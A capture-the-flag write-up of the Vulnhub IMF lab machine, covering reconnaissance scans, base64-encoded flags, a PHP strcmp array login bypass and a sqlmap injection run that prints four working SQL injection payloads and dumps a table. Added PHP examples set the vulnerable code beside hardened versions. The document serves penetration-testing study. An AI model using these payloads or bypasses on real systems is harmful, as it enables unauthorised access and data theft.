Vulnhub: IMF target machine testing process (partial)
IMF
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:cc:e7:6e 1 60 PCS Systemtechnik GmbH
192.168.56.148 08:00:27:99:c0:35 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.148.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.148 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 01:38 EST
Nmap scan report for localhost (192.168.56.148)
Host is up (0.0011s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF - Homepage
MAC Address: 08:00:27:99:C0:35 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.27 seconds
The NMAP scan results show that the target host has 1 open port: 80 (HTTP).
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ curl http://192.168.56.148/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.148 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ nikto -h http://192.168.56.148
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.148
+ Target Hostname: 192.168.56.148
+ Target Port: 80
+ Start Time: 2023-01-03 01:46:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-01-03 01:47:27 (GMT-5) (61 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ gobuster dir -u http://192.168.56.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.148
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/03 01:48:40 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.148/images/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.148/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.148/js/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.148/fonts/]
/less (Status: 301) [Size: 315] [--> http://192.168.56.148/less/]
/server-status (Status: 403) [Size: 302]
Progress: 218473 / 220561 (99.05%)
===============================================================
2023/01/03 01:49:29 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ gobuster dir -u http://192.168.56.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.148
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,txt,sh,js
[+] Timeout: 10s
===============================================================
2023/01/03 01:49:46 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 294]
/images (Status: 301) [Size: 317] [--> http://192.168.56.148/images/]
/.php (Status: 403) [Size: 293]
/index.php (Status: 200) [Size: 4797]
/contact.php (Status: 200) [Size: 8649]
/projects.php (Status: 200) [Size: 6574]
/css (Status: 301) [Size: 314] [--> http://192.168.56.148/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.148/js/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.148/fonts/]
/less (Status: 301) [Size: 315] [--> http://192.168.56.148/less/]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
Progress: 1322225 / 1323366 (99.91%)
===============================================================
2023/01/03 01:55:18 Finished
===============================================================
The source of the contact.php page contains a comment:
<section id="service">
<div class="container">
<!-- flag1{YWxsdGhlZmlsZXM=} -->
<div class="service-wrapper">
<div class="row">
Decode it:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ echo 'YWxsdGhlZmlsZXM=' | base64 -d
allthefiles
<!-- Js -->
<script src="js/vendor/modernizr-2.6.2.min.js"></script>
<script src="js/vendor/jquery-1.10.2.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/ZmxhZzJ7YVcxbVl.js"></script>
<script src="js/XUnRhVzVwYzNS.js"></script>
<script src="js/eVlYUnZjZz09fQ==.min.js"></script>
<script>
new WOW(
).init();
</script>
Note that the js file names here look odd; concatenate them and decode the result:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ echo 'ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==' | base64 -d
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ echo 'aW1mYWRtaW5pc3RyYXRvcg==' |base 64 -d
Command 'base' not found, did you mean:
command 'basez' from deb basez
command 'ase' from deb ase
command 'bash' from deb bash
command 'basex' from deb basex
Try: sudo apt install <deb name>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ echo 'aW1mYWRtaW5pc3RyYXRvcg==' |base64 -d
imfadministrator
imfadministrator should be a new directory name; visiting that directory returns a user login form.
The page source is:
Invalid username.<form method="POST" action="">
<label>Username:</label><input type="text" name="user" value=""><br />
<label>Password:</label><input type="password" name="pass" value=""><br />
<input type="submit" value="Login">
<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->
</form>
So there is no SQL injection vulnerability here. Could hydra be used to crack the password, with the username roger?
Testing the login manually with roger returns "Invalid username", so that username is wrong.
The contact page lists 3 email addresses:
rmichaels@imf.local,akeith@imf.local,estone@imf.local
Try rmichaels, akeith and estone in turn.
When logging in as rmichaels, the response is "Invalid password".
From the comment we know the password is hard-coded directly in the PHP file.
The guess is that something like strcmp is used to check the password. strcmp returns 0 when its two string arguments are equal, but when a string is compared with an array, the strcmp result is also treated as 0.
So change <input name="pass" value="" type="password"> in the page source
to <input name="pass[]" value="" type="password">,
which turns the pass parameter into an array.
After a successful login, the page returns:
flag3{Y29udGludWVUT2Ntcw==}
Welcome, rmichaels
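As an added example (not code from the IMF machine, whose PHP source is not shown on this page), here is the kind of hard-coded check the comment above suggests, beside a hardened version. The password constant is a placeholder. The mechanism behind the pass[] trick: on PHP 5 and 7, strcmp() given an array emits a warning and returns NULL, and the loose comparison NULL == 0 is true, so the login succeeds; PHP 8 throws a TypeError instead.

```php
<?php
// Added example, not the IMF machine's own login code.
// The password value is a placeholder, not the machine's real one.
const HARDCODED_PASSWORD = 'PLACEHOLDER-not-the-real-password';

// Vulnerable form: strcmp() on untrusted input with a loose (==) comparison.
// On PHP 5/7, strcmp('...', array) returns NULL with a warning,
// and NULL == 0 is true, so a request with pass[]= passes the check.
function vulnerableCheck(array $post): bool
{
    $pass = $post['pass'] ?? '';
    return strcmp($pass, HARDCODED_PASSWORD) == 0;
}

// Hardened form: reject anything that is not a string, then compare in
// constant time. hash_equals() only accepts strings, so an array can
// never reach the comparison.
function hardenedCheck(array $post): bool
{
    $pass = $post['pass'] ?? null;
    if (!is_string($pass)) {
        return false; // arrays, ints and missing values never match
    }
    return hash_equals(HARDCODED_PASSWORD, $pass);
}

// Constructed request bodies: a normal wrong password, and the array
// that a field named pass[] produces.
$normal   = ['user' => 'rmichaels', 'pass' => 'wrongpassword'];
$arrayArg = ['user' => 'rmichaels', 'pass' => ['']];

echo "vulnerable, string input: ", var_export(vulnerableCheck($normal), true), "\n";
try {
    // PHP 5/7: the array bypasses the check; PHP 8 raises TypeError instead.
    echo "vulnerable, array input:  ", var_export(@vulnerableCheck($arrayArg), true), "\n";
} catch (TypeError $e) {
    echo "vulnerable, array input:  TypeError from strcmp() on PHP 8+\n";
}
echo "hardened, string input:   ", var_export(hardenedCheck($normal), true), "\n";
echo "hardened, array input:    ", var_export(hardenedCheck($arrayArg), true), "\n";
```

The is_string() guard is the essential part: PHP populates $_POST with arrays whenever the field name ends in [], so any comparison function that is handed $_POST values unchecked inherits this problem, not just strcmp().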
After entering the CMS and browsing its pages, the pagename parameter in the URL turns out to be an injection point; copy the session cookie and test it with sqlmap:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ sqlmap -u http://192.168.56.148/imfadministrator/cms.php?pagename=upload --cookie='PHPSESSID=uhlmpr7dj8g85k0hdhd1dqqpo2' --dump
___
__H__
___ ___["]_____ ___ ___ {1.6.7#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 03:04:22 /2023-01-03/
[03:04:24] [INFO] testing connection to the target URL
[03:04:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[03:04:24] [INFO] testing if the target URL content is stable
[03:04:24] [INFO] target URL content is stable
[03:04:24] [INFO] testing if GET parameter 'pagename' is dynamic
[03:04:24] [INFO] GET parameter 'pagename' appears to be dynamic
[03:04:24] [INFO] heuristic (basic) test shows that GET parameter 'pagename' might be injectable (possible DBMS: 'MySQL')
[03:04:24] [INFO] testing for SQL injection on GET parameter 'pagename'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[03:04:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:04:30] [INFO] GET parameter 'pagename' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Under")
[03:04:30] [INFO] testing 'Generic inline queries'
[03:04:30] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[03:04:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[03:04:30] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[03:04:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[03:04:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[03:04:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[03:04:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[03:04:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[03:04:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[03:04:30] [INFO] GET parameter 'pagename' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[03:04:30] [INFO] testing 'MySQL inline queries'
[03:04:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[03:04:30] [WARNING] time-based comparison requires larger statistical model, please wait........... (done)
[03:04:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[03:04:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[03:04:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[03:04:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[03:04:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[03:04:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[03:04:40] [INFO] GET parameter 'pagename' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[03:04:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:04:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:04:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:04:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[03:04:40] [INFO] target URL appears to have 1 column in query
[03:04:40] [INFO] GET parameter 'pagename' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'pagename' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: pagename (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagename=upload' AND 8675=8675 AND 'uIWb'='uIWb
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pagename=upload' AND (SELECT 2178 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2178=2178,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QMmN'='QMmN
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pagename=upload' AND (SELECT 5062 FROM (SELECT(SLEEP(5)))uNLZ) AND 'hBuo'='hBuo
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: pagename=-1167' UNION ALL SELECT CONCAT(0x717a717671,0x6e59584253694e6f465a6176756e42666d51434f6d655079616951736c6e616476476e7a72424c48,0x71786a7671)#
---
[03:04:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[03:04:48] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[03:04:48] [INFO] fetching current database
[03:04:48] [INFO] fetching tables for database: 'admin'
[03:04:48] [INFO] fetching columns for table 'pages' in database 'admin'
[03:04:48] [INFO] retrieved: 'id','int(11)'
[03:04:48] [INFO] retrieved: 'pagename','varchar(255)'
[03:04:48] [INFO] retrieved: 'pagedata','text'
[03:04:48] [INFO] fetching entries for table 'pages' in database 'admin'
[03:04:48] [INFO] retrieved: '1','Under Construction.','upload'
[03:04:48] [INFO] retrieved: '2','Welcome to the IMF Administration.','home'
[03:04:48] [INFO] retrieved: '3','Training classrooms available. <br /><img src="./images/whiteboard.jpg"><br /> Contact us...
[03:04:48] [INFO] retrieved: '4','<h1>Disavowed List</h1><img src="./images/redacted.jpg"><br /><ul><li>*********</li><li>*...
Database: admin
Table: pages
[4 entries]
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
| id | pagedata | pagename |
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
| 1 | Under Construction. | upload |
| 2 | Welcome to the IMF Administration. | home |
| 3 | Training classrooms available. <br /><img src="./images/whiteboard.jpg"><br /> Contact us for training. | tutorials-incomplete |
| 4 | <h1>Disavowed List</h1><img src="./images/redacted.jpg"><br /><ul><li>*********</li><li>****** ******</li><li>*******</li><li>**** ********</li></ul><br />-Secretary | disavowlist |
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
[03:04:49] [INFO] table 'admin.pages' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.148/dump/admin/pages.csv'
[03:04:49] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.148'
[*] ending @ 03:04:49 /2023-01-03/
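The admin.pages table that sqlmap enumerated above is looked up by pagename, and the four payloads it reports all work by breaking out of a single-quoted string literal. As an added example (not the IMF CMS's own code), here is that lookup written first with string concatenation, the pattern that makes the parameter injectable, and then with a prepared statement. It uses an in-memory SQLite database so it runs offline; the machine runs MySQL, but the PDO calls are the same. The probe input is constructed to have the same shape as the boolean-based payload sqlmap listed.

```php
<?php
// Added example, not the IMF CMS's own code. Table and sample rows are
// modelled on the sqlmap dump above; the database here is SQLite in memory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, pagename TEXT, pagedata TEXT)');
$db->exec("INSERT INTO pages (pagename, pagedata) VALUES
    ('upload', 'Under Construction.'),
    ('home',   'Welcome to the IMF Administration.')");

// Vulnerable: the request value is pasted straight into the SQL text,
// so a quote in the input becomes SQL syntax.
function lookupVulnerable(PDO $db, string $pagename): array
{
    $sql = "SELECT pagedata FROM pages WHERE pagename = '" . $pagename . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: the value is bound as a parameter and can only ever be
// compared as data, whatever characters it contains.
function lookupPrepared(PDO $db, string $pagename): array
{
    $stmt = $db->prepare('SELECT pagedata FROM pages WHERE pagename = ?');
    $stmt->execute([$pagename]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed probe in the shape of sqlmap's boolean-based payload:
// it closes the quoted literal, appends a tautology, and reopens a quote.
$probe = "upload' AND 1=1 AND 'x'='x";

// With concatenation the tautology is evaluated as SQL and the 'upload'
// row comes back; with the prepared statement no page has that literal
// name and the result is empty.
echo "concatenated: "; print_r(lookupVulnerable($db, $probe));
echo "prepared:     "; print_r(lookupPrepared($db, $probe));
```

The difference in the two result sets is exactly the oracle that boolean-based blind injection relies on, which is also why the prepared version defeats every technique in sqlmap's list at once rather than one payload at a time.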
http://192.168.56.148/imfadministrator/images/whiteboard.jpg
Visiting this image shows a QR code; scanning it gives the 4th flag:
flag4{dXBsb2Fkcjk0Mi5waHA=}
Decode it:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ echo 'dXBsb2Fkcjk0Mi5waHA=' | base64 -d
uploadr942.php